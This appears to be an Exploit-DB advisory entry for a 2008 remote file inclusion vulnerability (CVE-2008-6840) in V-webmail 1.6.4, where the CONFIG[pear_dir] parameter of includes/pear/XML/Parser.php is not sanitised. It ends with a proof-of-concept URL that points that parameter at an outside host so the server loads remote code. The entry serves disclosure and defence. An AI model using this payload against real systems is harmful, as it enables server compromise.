V-webmail 1.6.4 - includes/pear/XML/Parser.php CONFIGpear_dir Parameter Remote File Inclusion

2008-07-10T00:00:00
ID EDB-ID:32026
Type exploitdb
Reporter CraCkEr
Modified 2008-07-10T00:00:00

Description

V-webmail 1.6.4 includes/pear/XML/Parser.php CONFIG[pear_dir] Parameter Remote File Inclusion. CVE-2008-6840. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30162/info
  
V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
  
V-webmail 1.6.4 is vulnerable; other versions may also be affected.

http://www.example.com/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http://www.example2.com